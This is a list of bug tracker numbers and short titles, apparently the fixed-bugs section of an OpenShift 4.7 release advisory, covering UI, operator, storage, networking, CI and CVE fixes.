1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted
1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input
1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation
1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1
1905404 - The example of "Remove the entrypoint on the mysql:latest image" for `oc image append` does not work
1905416 - Hyperlink not working from Operator Description
1905430 - usbguard extension fails to install because of missing correct protobuf dependency version
1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads
1905502 - Test flake - unable to get https transport for ephemeral-registry
1905542 - [GSS] The "External" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6.
1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs
1905610 - Fix typo in export script
1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster
1905640 - Subscription manual approval test is flaky
1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry
1905696 - ClusterMoreUpdatesModal component did not get internationalized
1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes
1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project
1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster
1905792 - [OVN]Cannot create egressfirewalll with dnsName
1905889 - Should create SA for each namespace that the operator scoped
1905920 - Quickstart exit and restart
1905941 - Page goes to error after create catalogsource
1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711
1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters
1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected
1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it
1906118 - OCS feature detection constantly polls storageclusters and storageclasses
1906120 - 'Create Role Binding' form not setting user or group value when created from a user or group resource
1906121 - [oc] After new-project creation, the kubeconfig file does not set the project
1906134 - OLM should not create OperatorConditions for copied CSVs
1906143 - CBO supports log levels
1906186 - i18n: Translators are not able to translate `this` without context for alert manager config
1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots
1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize.
1906276 - `oc image append` can't work with multi-arch image with --filter-by-os='.*'
1906318 - use proper term for Authorized SSH Keys
1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional
1906356 - Unify Clone PVC boot source flow with URL/Container boot source
1906397 - IPA has incorrect kernel command line arguments
1906441 - HorizontalNav and NavBar have invalid keys
1906448 - Deploy using virtualmedia with provisioning network disabled fails - 'Failed to connect to the agent' in ironic-conductor log
1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project
1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node's memory and killing them
1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures
1906511 - Root reprovisioning tests flaking often in CI
1906517 - Validation is not robust enough and may prevent to generate install-confing.
1906518 - Update snapshot API CRDs to v1
1906519 - Update LSO CRDs to use v1
1906570 - Number of disruptions caused by reboots on a cluster cannot be measured
1906588 - [ci][sig-builds] nodes is forbidden: User "e2e-test-jenkins-pipeline-xfghs-user" cannot list resource "nodes" in API group "" at the cluster scope
1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs
1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs
1906679 - quick start panel styles are not loaded
1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber
1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form
1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created
1906689 - user can pin to nav configmaps and secrets multiple times
1906691 - Add doc which describes disabling helm chart repository
1906713 - Quick starts not accesible for a developer user
1906718 - helm chart "provided by Redhat" is misspelled
1906732 - Machine API proxy support should be tested
1906745 - Update Helm endpoints to use Helm 3.4.x
1906760 - performance issues with topology constantly re-rendering
1906766 - localized `Autoscaled` & `Autoscaling` pod texts overlap with the pod ring
1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section
1906769 - topology fails to load with non-kubeadmin user
1906770 - shortcuts on mobiles view occupies a lot of space
1906798 - Dev catalog customization doesn't update console-config ConfigMap
1906806 - Allow installing extra packages in ironic container images
1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer
1906835 - Topology view shows add page before then showing full project workloads
1906840 - ClusterOperator should not have status "Updating" if operator version is the same as the release version
1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy
1906860 - Bump kube dependencies to v1.20 for Net Edge components
1906864 - Quick Starts Tour: Need to adjust vertical spacing
1906866 - Translations of Sample-Utils
1906871 - White screen when sort by name in monitoring alerts page
1906872 - Pipeline Tech Preview Badge Alignment
1906875 - Provide an option to force backup even when API is not available.
1906877 - Placeholder' value in search filter do not match column heading in Vulnerabilities
1906879 - Add missing i18n keys
1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install
1906896 - No Alerts causes odd empty Table (Need no content message)
1906898 - Missing User RoleBindings in the Project Access Web UI
1906899 - Quick Start - Highlight Bounding Box Issue
1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1
1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers
1906935 - Delete resources when Provisioning CR is deleted
1906968 - Must-gather should support collecting kubernetes-nmstate resources
1906986 - Ensure failed pod adds are retried even if the pod object doesn't change
1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt
1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change
1907211 - beta promotion of p&f switched storage version to v1beta1, making downgrades impossible.
1907269 - Tooltips data are different when checking stack or not checking stack for the same time
1907280 - Install tour of OCS not available.
1907282 - Topology page breaks with white screen
1907286 - The default mhc machine-api-termination-handler couldn't watch spot instance
1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent
1907293 - Increase timeouts in e2e tests
1907295 - Gherkin script for improve management for helm
1907299 - Advanced Subscription Badge for KMS and Arbiter not present
1907303 - Align VM template list items by baseline
1907304 - Use PF styles for selected template card in VM Wizard
1907305 - Drop 'ISO' from CDROM boot source message
1907307 - Support and provider labels should be passed on between templates and sources
1907310 - Pin action should be renamed to favorite
1907312 - VM Template source popover is missing info about added date
1907313 - ClusterOperator objects cannot be overriden with cvo-overrides
1907328 - iproute-tc package is missing in ovn-kube image
1907329 - CLUSTER_PROFILE env. variable is not used by the CVO
1907333 - Node stuck in degraded state, mcp reports "Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached"
1907373 - Rebase to kube 1.20.0
1907375 - Bump to latest available 1.20.x k8s - workloads team
1907378 - Gather netnamespaces networking info
1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity
1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn't match the CSV one
1907390 - prometheus-adapter: panic after k8s 1.20 bump
1907399 - build log icon link on topology nodes cause app to reload
1907407 - Buildah version not accessible
1907421 - [4.6.1]oc-image-mirror command failed on "error: unable to copy layer"
1907453 - Dev Perspective -> running vm details -> resources -> no data
1907454 - Install PodConnectivityCheck CRD with CNO
1907459 - "The Boot source is also maintained by Red Hat." is always shown for all boot sources
1907475 - Unable to estimate the error rate of ingress across the connected fleet
1907480 - `Active alerts` section throwing forbidden error for users.
1907518 - Kamelets/Eventsource should be shown to user if they have create access
1907543 - Korean timestamps are shown when users' language preferences are set to German-en-en-US
1907610 - Update kubernetes deps to 1.20
1907612 - Update kubernetes deps to 1.20
1907621 - openshift/installer: bump cluster-api-provider-kubevirt version
1907628 - Installer does not set primary subnet consistently
1907632 - Operator Registry should update its kubernetes dependencies to 1.20
1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters
1907644 - fix up handling of non-critical annotations on daemonsets/deployments
1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?)
1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication
1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail
1907767 - [e2e][automation]update test suite for kubevirt plugin
1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don't allow master and worker nodes to boot
1907792 - The `overrides` of the OperatorCondition cannot block the operator upgrade
1907793 - Surface support info in VM template details
1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage
1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set
1907863 - Quickstarts status not updating when starting the tour
1907872 - dual stack with an ipv6 network fails on bootstrap phase
1907874 - QE - Design Gherkin Scenarios for epic ODC-5057
1907875 - No response when try to expand pvc with an invalid size
1907876 - Refactoring record package to make gatherer configurable
1907877 - QE - Automation- pipelines builder scripts
1907883 - Fix Pipleine creation without namespace issue
1907888 - Fix pipeline list page loader
1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form
1907892 - Unable to edit application deployed using "From Devfile" option
1907893 - navSortUtils.spec.ts unit test failure
1907896 - When a workload is added, Topology does not place the new items well
1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template
1907924 - Enable madvdontneed in OpenShift Images
1907929 - Enable madvdontneed in OpenShift System Components Part 2
1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot
1907947 - The kubeconfig saved in tenantcluster shouldn't include anything that is not related to the current context
1907948 - OCM-O bump to k8s 1.20
1907952 - bump to k8s 1.20
1907972 - Update OCM link to open Insights tab
1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI
1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916
1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni
1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk
1908035 - dynamic-demo-plugin build does not generate dist directory
1908135 - quick search modal is not centered over topology
1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled
1908159 - [AWS C2S] MCO fails to sync cloud config
1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384)
1908180 - Add source for template is stucking in preparing pvc
1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens
1908231 - [Migration] The pods ovnkube-node are in CrashLoopBackOff after SDN to OVN
1908277 - QE - Automation- pipelines actions scripts
1908280 - Documentation describing `ignore-volume-az` is incorrect
1908296 - Fix pipeline builder form yaml switcher validation issue
1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI
1908323 - Create button missing for PLR in the search page
1908342 - The new pv_collector_total_pv_count is not reported via telemetry
1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name
1908347 - CVO overwrites ValidatingWebhookConfiguration for snapshots
1908349 - Volume snapshot tests are failing after 1.20 rebase
1908353 - QE - Automation- pipelines runs scripts
1908361 - bump to k8s 1.20
1908367 - QE - Automation- pipelines triggers scripts
1908370 - QE - Automation- pipelines secrets scripts
1908375 - QE - Automation- pipelines workspaces scripts
1908381 - Go Dependency Fixes for Devfile Lib
1908389 - Loadbalancer Sync failing on Azure
1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived
1908407 - Backport Upstream 95269 to fix potential crash in kubelet
1908410 - Exclude Yarn from VSCode search
1908425 - Create Role Binding form subject type and name are undefined when All Project is selected
1908431 - When the marketplace-operator pod get's restarted, the custom catalogsources are gone, as well as the pods
1908434 - Remove &apos from metal3-plugin internationalized strings
1908437 - Operator backed with no icon has no badge associated with the CSV tag
1908459 - bump to k8s 1.20
1908461 - Add bugzilla component to OWNERS file
1908462 - RHCOS 4.6 ostree removed dhclient
1908466 - CAPO AZ Screening/Validating
1908467 - Zoom in and zoom out in topology package should be sentence case
1908468 - [Azure][4.7] Installer can't properly parse instance type with non integer memory size
1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster
1908471 - OLM should bump k8s dependencies to 1.20
1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests
1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM
1908545 - VM clone dialog does not open
1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard
1908562 - Pod readiness is not being observed in real world cases
1908565 - [4.6] Cannot filter the platform/arch of the index image
1908573 - Align the style of flavor
1908583 - bootstrap does not run on additional networks if configured for master in install-config
1908596 - Race condition on operator installation
1908598 - Persistent Dashboard shows events for all provisioners
1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state
1908648 - Skip TestKernelType test on OKD, adjust TestExtensions
1908650 - The title of customize wizard is inconsistent
1908654 - cluster-api-provider: volumes and disks names shouldn't change by machine-api-operator
1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s]
1908687 - Option to save user settings separate when using local bridge (affects console developers only)
1908697 - Show `kubectl diff ` command in the oc diff help page
1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom
1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds
1908717 - "missing unit character in duration" error in some network dashboards
1908746 - [Safari] Drop Shadow doesn't works as expected on hover on workload
1908747 - stale S3 CredentialsRequest in CCO manifest
1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase
1908830 - RHCOS 4.6 - Missing Initiatorname
1908868 - Update empty state message for EventSources and Channels tab
1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes
1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference
1908888 - Dualstack does not work with multiple gateways
1908889 - Bump CNO to k8s 1.20
1908891 - TestDNSForwarding DNS operator e2e test is failing frequently
1908914 - CNO: upgrade nodes before masters
1908918 - Pipeline builder yaml view sidebar is not responsive
1908960 - QE - Design Gherkin Scenarios
1908971 - Gherkin Script for pipeline debt 4.7
1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated
1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console
1908998 - [cinder-csi-driver] doesn't detect the credentials change
1909004 - "No datapoints found" for RHEL node's filesystem graph
1909005 - i18n: workloads list view heading is not translated
1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects
1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type
1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware
1909067 - Web terminal should keep latest output when connection closes
1909070 - PLR and TR Logs component is not streaming as fast as tkn
1909092 - Error Message should not confuse user on Channel form
1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page
1909108 - Machine API components should use 1.20 dependencies
1909116 - Catalog Sort Items dropdown is not aligned on Firefox
1909198 - Move Sink action option is not working
1909207 - Accessibility Issue on monitoring page
1909236 - Remove pinned icon overlap on resource name
1909249 - Intermittent packet drop from pod to pod
1909276 - Accessibility Issue on create project modal
1909289 - oc debug of an init container no longer works
1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2
1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle
1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it
1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O
1909464 - Build operator-registry with golang-1.15
1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found
1909521 - Add kubevirt cluster type for e2e-test workflow
1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created
1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node
1909610 - Fix available capacity when no storage class selected
1909678 - scale up / down buttons available on pod details side panel
1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART
1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined
1909739 - Arbiter request data changes
1909744 - cluster-api-provider-openstack: Bump gophercloud
1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline
1909791 - Update standalone kube-proxy config for EndpointSlice
1909792 - Empty states for some details page subcomponents are not i18ned
1909815 - Perspective switcher is only half-i18ned
1909821 - OCS 4.7 LSO installation blocked because of Error "Invalid value: "integer": spec.flexibleScaling in body
1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn't installed in CI
1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing
1909911 - [OVN]EgressFirewall caused a segfault
1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument
1909958 - Support Quick Start Highlights Properly
1909978 - ignore-volume-az = yes not working on standard storageClass
1909981 - Improve statement in template select step
1909992 - Fail to pull the bundle image when using the private index image
1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev
1910036 - QE - Design Gherkin Scenarios ODC-4504
1910049 - UPI: ansible-galaxy is not supported
1910127 - [UPI on oVirt]: Improve UPI Documentation
1910140 - fix the api dashboard with changes in upstream kube 1.20
1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment's containers with the OPERATOR_CONDITION_NAME Environment Variable
1910165 - DHCP to static lease script doesn't handle multiple addresses
1910305 - [Descheduler] - The minKubeVersion should be 1.20.0
1910409 - Notification drawer is not localized for i18n
1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials
1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation
1910501 - Installed Operators->Operand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page
1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work
1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready
1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability
1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded
1910739 - Redfish-virtualmedia (idrac) deploy fails on "The Virtual Media image server is already connected"
1910753 - Support Directory Path to Devfile
1910805 - Missing translation for Pipeline status and breadcrumb text
1910829 - Cannot delete a PVC if the dv's phase is WaitForFirstConsumer
1910840 - Show Nonexistent command info in the `oc rollback -h` help page
1910859 - breadcrumbs doesn't use last namespace
1910866 - Unify templates string
1910870 - Unify template dropdown action
1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6
1911129 - Monitoring charts renders nothing when switching from a Deployment to "All workloads"
1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard
1911212 - [MSTR-998] API Performance Dashboard "Period" drop-down has a choice "$__auto_interval_period" which can bring "1:154: parse error: missing unit character in duration"
1911213 - Wrong and misleading warning for VMs that were created manually (not from template)
1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created
1911269 - waiting for the build message present when build exists
1911280 - Builder images are not detected for Dotnet, Httpd, NGINX
1911307 - Pod Scale-up requires extra privileges in OpenShift web-console
1911381 - "Select Persistent Volume Claim project" shows in customize wizard when select a source available template
1911382 - "source volumeMode (Block) and target volumeMode (Filesystem) do not match" shows in VM Error
1911387 - Hit error - "Cannot read property 'value' of undefined" while creating VM from template
1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation
1911418 - [v2v] The target storage class name is not displayed if default storage class is used
1911434 - git ops empty state page displays icon with watermark
1911443 - SSH Cretifiaction field should be validated
1911465 - IOPS display wrong unit
1911474 - Devfile Application Group Does Not Delete Cleanly (errors)
1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController
1911574 - Expose volume mode on Upload Data form
1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined
1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel
1911656 - using 'operator-sdk run bundle' to install operator successfully, but the command output said 'Failed to run bundle''
1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state
1911782 - Descheduler should not evict pod used local storage by the PVC
1911796 - uploading flow being displayed before submitting the form
1912066 - The ansible type operator's manager container is not stable when managing the CR
1912077 - helm operator's default rbac forbidden
1912115 - [automation] Analyze job keep failing because of 'JavaScript heap out of memory'
1912237 - Rebase CSI sidecars for 4.7
1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page
1912409 - Fix flow schema deployment
1912434 - Update guided tour modal title
1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken
1912523 - Standalone pod status not updating in topology graph
1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion
1912558 - TaskRun list and detail screen doesn't show Pending status
1912563 - p&f: carry 97206: clean up executing request on panic
1912565 - OLM macOS local build broken by moby/term dependency
1912567 - [OCP on RHV] Node becomes to 'NotReady' status when shutdown vm from RHV UI only on the second deletion
1912577 - 4.1/4.2->4.3->...-> 4.7 upgrade is stuck during 4.6->4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff
1912590 - publicImageRepository not being populated
1912640 - Go operator's controller pods is forbidden
1912701 - Handle dual-stack configuration for NIC IP
1912703 - multiple queries can't be plotted in the same graph under some conditons
1912730 - Operator backed: In-context should support visual connector if SBO is not installed
1912828 - Align High Performance VMs with High Performance in RHV-UI
1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates
1912852 - VM from wizard - available VM templates - "storage" field is "0 B"
1912888 - recycler template should be moved to KCM operator
1912907 - Helm chart repository index can contain unresolvable relative URL's
1912916 - Set external traffic policy to cluster for IBM platform
1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller
1912938 - Update confirmation modal for quick starts
1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment
1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment
1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver
1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912977 - rebase upstream static-provisioner
1913006 - Remove etcd v2 specific alerts with etcd_http* metrics
1913011 - [OVN] Pod's external traffic not use egressrouter macvlan ip as a source ip
1913037 - update static-provisioner base image
1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state
1913085 - Regression OLM uses scoped client for CRD installation
1913096 - backport: cadvisor machine metrics are missing in k8s 1.19
1913132 - The installation of Openshift Virtualization reports success early before it 's succeeded eventually
1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root
1913196 - Guided Tour doesn't handle resizing of browser
1913209 - Support modal should be shown for community supported templates
1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort
1913249 - update info alert this template is not aditable
1913285 - VM list empty state should link to virtualization quick starts
1913289 - Rebase AWS EBS CSI driver for 4.7
1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled
1913297 - Remove restriction of taints for arbiter node
1913306 - unnecessary scroll bar is present on quick starts panel
1913325 - 1.20 rebase for openshift-apiserver
1913331 - Import from git: Fails to detect Java builder
1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used
1913343 - (release-4.7) Added changelog file for insights-operator
1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator
1913371 - Missing i18n key "Administrator" in namespace "console-app" and language "en."
1913386 - users can see metrics of namespaces for which they don't have rights when monitoring own services with prometheus user workloads
1913420 - Time duration setting of resources is not being displayed
1913536 - 4.6.9 -> 4.7 upgrade hangs. RHEL 7.9 worker stuck on "error enabling unit: Failed to execute operation: File exists\\n\"
1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase
1913560 - Normal user cannot load template on the new wizard
1913563 - "Virtual Machine" is not on the same line in create button when logged with normal user
1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table
1913568 - Normal user cannot create template
1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker
1913585 - Topology descriptive text fixes
1913608 - Table data contains data value None after change time range in graph and change back
1913651 - Improved Red Hat image and crashlooping OpenShift pod collection
1913660 - Change location and text of Pipeline edit flow alert
1913685 - OS field not disabled when creating a VM from a template
1913716 - Include additional use of existing libraries
1913725 - Refactor Insights Operator Plugin states
1913736 - Regression: fails to deploy computes when using root volumes
1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes
1913751 - add third-party network plugin test suite to openshift-tests
1913783 - QE-To fix the merging pr issue, commenting the afterEach() block
1913807 - Template support badge should not be shown for community supported templates
1913821 - Need definitive steps about uninstalling descheduler operator
1913851 - Cluster Tasks are not sorted in pipeline builder
1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists
1913951 - Update the Devfile Sample Repo to an Official Repo Host
1913960 - Cluster Autoscaler should use 1.20 dependencies
1913969 - Field dependency descriptor can sometimes cause an exception
1914060 - Disk created from 'Import via Registry' cannot be used as boot disk
1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy
1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks)
1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances
1914125 - Still using /dev/vde as default device path when create localvolume
1914183 - Empty NAD page is missing link to quickstarts
1914196 - target port in `from dockerfile` flow does nothing
1914204 - Creating VM from dev perspective may fail with template not found error
1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets
1914212 - [e2e][automation] Add test to validate bootable disk souce
1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes
1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows
1914287 - Bring back selfLink
1914301 - User VM Template source should show the same provider as template itself
1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs
1914309 - /terminal page when WTO not installed shows nonsensical error
1914334 - order of getting started samples is arbitrary
1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel] timeout on s390x
1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI
1914405 - Quick search modal should be opened when coming back from a selection
1914407 - Its not clear that node-ca is running as non-root
1914427 - Count of pods on the dashboard is incorrect
1914439 - Typo in SRIOV port create command example
1914451 - cluster-storage-operator pod running as root
1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true
1914642 - Customize Wizard Storage tab does not pass validation
1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling
1914793 - device names should not be translated
1914894 - Warn about using non-groupified api version
1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug
1914932 - Put correct resource name in relatedObjects
1914938 - PVC disk is not shown on customization wizard general tab
1914941 - VM Template rootdisk is not deleted after fetching default disk bus
1914975 - Collect logs from openshift-sdn namespace
1915003 - No estimate of average node readiness during lifetime of a cluster
1915027 - fix MCS blocking iptables rules
1915041 - s3:ListMultipartUploadParts is relied on implicitly
1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons
1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours
1915085 - Pods created and rapidly terminated get stuck
1915114 - [aws-c2s] worker machines are not create during install
1915133 - Missing default pinned nav items in dev perspective
1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource
1915187 - Remove the "Tech preview" tag in web-console for volumesnapshot
1915188 - Remove HostSubnet anonymization
1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment
1915217 - OKD payloads expect to be signed with production keys
1915220 - Remove dropdown workaround for user settings
1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure
1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod
1915277 - [e2e][automation]fix cdi upload form test
1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout
1915304 - Updating scheduling component builder & base images to be consistent with ART
1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node
1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection
1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod
1915357 - Dev Catalog doesn't load anything if virtualization operator is installed
1915379 - New template wizard should require provider and make support input a dropdown type
1915408 - Failure in operator-registry kind e2e test
1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation
1915460 - Cluster name size might affect installations
1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance
1915540 - Silent 4.7 RHCOS install failure on ppc64le
1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI)
1915582 - p&f: carry upstream pr 97860
1915594 - [e2e][automation] Improve test for disk validation
1915617 - Bump bootimage for various fixes
1915624 - "Please fill in the following field: Template provider" blocks customize wizard
1915627 - Translate Guided Tour text.
1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error
1915647 - Intermittent White screen when the connector dragged to revision
1915649 - "Template support" pop up is not a warning; checkbox text should be rephrased
1915654 - [e2e][automation] Add a verification for Afinity modal should hint "Matching node found"
1915661 - Can't run the 'oc adm prune' command in a pod
1915672 - Kuryr doesn't work with selfLink disabled.
1915674 - Golden image PVC creation - storage size should be taken from the template
1915685 - Message for not supported template is not clear enough
1915760 - Need to increase timeout to wait rhel worker get ready
1915793 - quick starts panel syncs incorrectly across browser windows
1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster
1915818 - vsphere-problem-detector: use "_totals" in metrics
